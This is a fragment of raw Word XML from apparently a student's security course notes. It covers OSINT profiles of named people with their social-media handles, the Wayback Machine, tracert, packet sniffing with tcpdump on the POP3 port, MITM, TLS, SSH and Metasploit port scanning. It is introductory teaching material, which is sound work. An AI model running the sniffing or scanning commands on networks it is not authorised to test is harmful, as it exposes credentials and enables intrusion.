          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00347098">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Cidnye</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00347098">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Work, M.Ed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="511B2ED1" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Cidney</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a university recruiter working for Meta. She went to Ohio University, and </w:t>
      </w:r>
      <w:r w:rsidRPr="006B4B28">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Institute for Veterans and Military Families</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. Her email address is: </w:t>
      </w:r>
      <w:r w:rsidRPr="006B4B28">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>linkedin.com/in/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006B4B28">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cidnyework</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ADFE06B" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00347098">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Andy Jassy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19B13035" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">He is president and CEO at Amazon. He studied at Harvard university. His email address is: </w:t>
      </w:r>
      <w:hyperlink r:id="rId110" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>linkedin.com/in/andy-jassy-8b1615</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3D9311BC" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00252732">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Serge </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00252732">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Leclercq</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4E1C20C7" w14:textId="77777777" w:rsidR="004E2155" w:rsidRPr="006B4B28" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00252732">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Sr. Account Manager Finance</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> working at</w:t>
      </w:r>
      <w:r w:rsidRPr="00252732">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00252732">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Secura</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. His email address is: </w:t>
      </w:r>
      <w:r w:rsidRPr="00252732">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>linkedin.com/in/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00252732">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sergeleclercq</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, and Twitter is: </w:t>
      </w:r>
      <w:hyperlink r:id="rId111" w:history="1">
        <w:r w:rsidRPr="009726D8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https://twitter.com/leclercqs</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28225713" w14:textId="77777777" w:rsidR="004E2155" w:rsidRPr="004578CB" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48733324" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>WayBack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="067DD19C" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="00000000" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId112" w:history="1">
        <w:r w:rsidR="004E2155" w:rsidRPr="009726D8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https://archive.org/web/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="004E2155">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a website that offers archive for the websites and what they looked like throughout their existence. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23DF05DF" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DF0F854" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="607390D2" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C87AE1E" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="2D3B45"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Let’s try to see how </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="2D3B45"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>nu.nl looked like 10 years ago.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C2F88F9" w14:textId="77777777" w:rsidR="004E2155" w:rsidRPr="00155E9B" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16A6644B" w14:textId="77777777" w:rsidR="004E2155" w:rsidRPr="003F6E5B" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>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A47AD3" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E718DAE" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155"/>
    <w:p w14:paraId="25551A96" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:r>
        <w:t>And this is how google.com looked like in 2007:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE9C62E" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>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Default="004E2155" w:rsidP="004E2155"/>
    <w:p w14:paraId="16AC32D5" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155"/>
    <w:p w14:paraId="6726E2DA" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155"/>
    <w:p w14:paraId="59D9BE5A" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155"/>
    <w:p w14:paraId="116877E3" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155"/>
    <w:p w14:paraId="6FCBF63C" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155"/>
    <w:p w14:paraId="7EB25387" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155"/>
    <w:p w14:paraId="1A3B6C70" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155"/>
    <w:p w14:paraId="74BBCB0B" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155"/>
    <w:p w14:paraId="63695456" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155"/>
    <w:p w14:paraId="5AD56472" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:r>
        <w:t>github.com in 2010:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="477B5742" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>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Default="004E2155" w:rsidP="004E2155"/>
    <w:p w14:paraId="6C32C8B7" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155"/>
    <w:p w14:paraId="734AFA01" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155"/>
    <w:p w14:paraId="1E65FD5D" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155"/>
    <w:p w14:paraId="49B59C25" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155"/>
    <w:p w14:paraId="57341C98" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155"/>
    <w:p w14:paraId="0539D54E" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155"/>
    <w:p w14:paraId="16B8BBE6" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155"/>
    <w:p w14:paraId="480D20A0" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155"/>
    <w:p w14:paraId="3AA96B33" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155"/>
    <w:p w14:paraId="10824B89" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155"/>
    <w:p w14:paraId="71988F99" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155"/>
    <w:p w14:paraId="04C9CFB4" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155"/>
    <w:p w14:paraId="4D31EE41" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155"/>
    <w:p w14:paraId="0F8E007E" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155"/>
    <w:p w14:paraId="55B5A32F" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155"/>
    <w:p w14:paraId="344231DE" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155"/>
    <w:p w14:paraId="6A7FEBC9" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>tracert</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tracert</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> command lists all the stops for a request to get to its destination.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48856B91" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Usage:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="417C6295" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:r w:rsidRPr="001428C5">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001428C5">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>tracert</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001428C5">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"> fhict.nl</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BDEBDDA" w14:textId="77777777" w:rsidR="004E2155" w:rsidRPr="001428C5" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>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Default="004E2155" w:rsidP="004E2155"/>
    <w:p w14:paraId="5447CF5A" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155"/>
    <w:p w14:paraId="61EA9812" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155"/>
    <w:p w14:paraId="7FD8C559" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155"/>
    <w:p w14:paraId="3A17ED3B" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155"/>
    <w:p w14:paraId="42F4BAB0" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155"/>
    <w:p w14:paraId="41AACC00" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155"/>
    <w:p w14:paraId="50610293" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155"/>
    <w:p w14:paraId="34ACB4CB" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155"/>
    <w:p w14:paraId="60A09F18" w14:textId="77777777" w:rsidR="004E2155" w:rsidRPr="0071361A" w:rsidRDefault="004E2155" w:rsidP="004E2155"/>
    <w:p w14:paraId="0D044346" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="44" w:name="_Toc115553357"/>
      <w:r w:rsidRPr="00A73FE2">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(BOK) Security Concepts (week 9-10)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="44"/>
    </w:p>
    <w:p w14:paraId="779588F4" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155"/>
    <w:p w14:paraId="3EB3DF25" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155"/>
    <w:p w14:paraId="15845481" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155"/>
    <w:p w14:paraId="10AA85F9" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155"/>
    <w:p w14:paraId="78E26244" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155"/>
    <w:p w14:paraId="1FE0CF7A" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155"/>
    <w:p w14:paraId="0E845011" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155"/>
    <w:p w14:paraId="6FC40029" w14:textId="77777777" w:rsidR="004E2155" w:rsidRPr="00B2488F" w:rsidRDefault="004E2155" w:rsidP="004E2155"/>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5" w:name="_Toc115553358"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Self-Study</w:t>
      </w:r>
      <w:bookmarkEnd w:id="45"/>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6" w:name="_Toc115553359"/>
      <w:r>
        <w:t>Protocols and Servers</w:t>
      </w:r>
      <w:bookmarkEnd w:id="46"/>
    </w:p>
    <w:p w14:paraId="6D045182" w14:textId="77777777" w:rsidR="004978C6" w:rsidRPr="004978C6" w:rsidRDefault="004978C6" w:rsidP="004978C6"/>
    <w:p w14:paraId="585B1410" w14:textId="27C3253B" w:rsidR="00223824" w:rsidRDefault="00BD0697" w:rsidP="00BD0697">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="47" w:name="_Toc115553360"/>
      <w:r>
        <w:t>Sniffing Attack</w:t>
      </w:r>
      <w:bookmarkEnd w:id="47"/>
    </w:p>
    <w:p w14:paraId="6CB91BD7" w14:textId="01448975" w:rsidR="00BD0697" w:rsidRDefault="00BD0697" w:rsidP="00BD0697">
      <w:r>
        <w:t>Using a network packet capture tool to get information about the target is called sniffing. Tools</w:t>
      </w:r>
      <w:r w:rsidR="003B5C0B">
        <w:t xml:space="preserve"> such as, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003B5C0B">
        <w:t>Tcpdump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003B5C0B">
        <w:t xml:space="preserve"> (CLI), Wireshark (GUI), </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003B5C0B">
        <w:t>Tshark</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003B5C0B">
        <w:t xml:space="preserve">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proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A40D93" w:rsidRPr="00A40D93">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A40D93" w:rsidRPr="00A40D93">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A40D93" w:rsidRPr="00A40D93">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>tcpdump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A40D93" w:rsidRPr="00A40D93">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"> port 110 -A</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="213452A9" w14:textId="1CDC6556" w:rsidR="00A40D93" w:rsidRDefault="00A40D93" w:rsidP="00A40D93">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to get the root permission.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23BEAE67" w14:textId="7C246FA7" w:rsidR="00A40D93" w:rsidRDefault="00A40D93" w:rsidP="00A40D93">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tcpdump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">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48" w:name="_Toc115553361"/>
      <w:r>
        <w:t>Man in the Middle Attack (MITM)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="48"/>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Default="00FC36F7" w:rsidP="00B83FB4">
      <w:r>
        <w:t xml:space="preserve">Here ar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17"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18"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49" w:name="_Toc115553362"/>
      <w:r>
        <w:t>Transport Layer Security (TLS)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="49"/>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50" w:name="_Toc115553363"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Secure Shell (SSH)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="50"/>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proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="00035369">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00035369">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00035369">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>username@ip_machine</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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lastRenderedPageBreak/>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bookmarkStart w:id="51" w:name="_Toc115553364"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:bookmarkEnd w:id="51"/>
    </w:p>
    <w:p w14:paraId="287E3F75" w14:textId="257411CB" w:rsidR="00D56067" w:rsidRDefault="009D6DD5" w:rsidP="00B83FB4">
      <w:r>
        <w:t>Metasploit is an exploitation framework. It can be accessed using th</w:t>
      </w:r>
      <w:r w:rsidR="00CF15EB">
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CLI command</w:t>
      </w:r>
      <w:r w:rsidR="00CF15EB">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="521B5AA4" w14:textId="1AD23962" w:rsidR="009D6DD5" w:rsidRDefault="009D6DD5" w:rsidP="00B83FB4">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>m</w:t>
      </w:r>
      <w:r w:rsidRPr="009D6DD5">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>sfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="21E08E00" w14:textId="5504E661" w:rsidR="009D6DD5" w:rsidRDefault="003A7FDF" w:rsidP="00B83FB4">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserv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70DB586F" w:rsidR="003A7FDF" w:rsidRDefault="003A7FDF" w:rsidP="00B83FB4">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> also supports tab completion. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="396DC664" w14:textId="4360B21C" w:rsidR="000D3773" w:rsidRDefault="00CF15EB" w:rsidP="000D3773">
      <w:r>
        <w:t>Metasploit offers modules t</w:t>
      </w:r>
      <w:r w:rsidR="000D3773">
        <w:t>hat scan open ports on the target system. We can look at the available modules using this command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29DC834D" w14:textId="427A2416" w:rsidR="00CF15EB" w:rsidRDefault="000D3773" w:rsidP="000D3773">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>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Default="003A7FDF" w:rsidP="00B83FB4"/>
    <w:p w14:paraId="6CE7D99B" w14:textId="77777777" w:rsidR="00683E25" w:rsidRDefault="00683E25" w:rsidP="00B83FB4"/>
    <w:p w14:paraId="6972055F" w14:textId="77777777" w:rsidR="00683E25" w:rsidRDefault="00683E25" w:rsidP="00B83FB4"/>
    <w:p w14:paraId="2C44C5F9" w14:textId="1593FD88" w:rsidR="003A7FDF" w:rsidRDefault="000D3773" w:rsidP="00B83FB4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Let us </w:t>
      </w:r>
      <w:r w:rsidRPr="000D3773">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>show options</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> auxiliary/scanner/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>portscan</w:t>
      </w:r>
